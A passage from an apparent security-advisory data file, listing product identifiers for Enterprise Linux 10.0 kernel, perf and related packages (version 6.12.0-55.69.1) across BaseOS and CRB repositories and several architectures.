"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"BaseOS-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"CRB-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"CRB-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"CRB-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
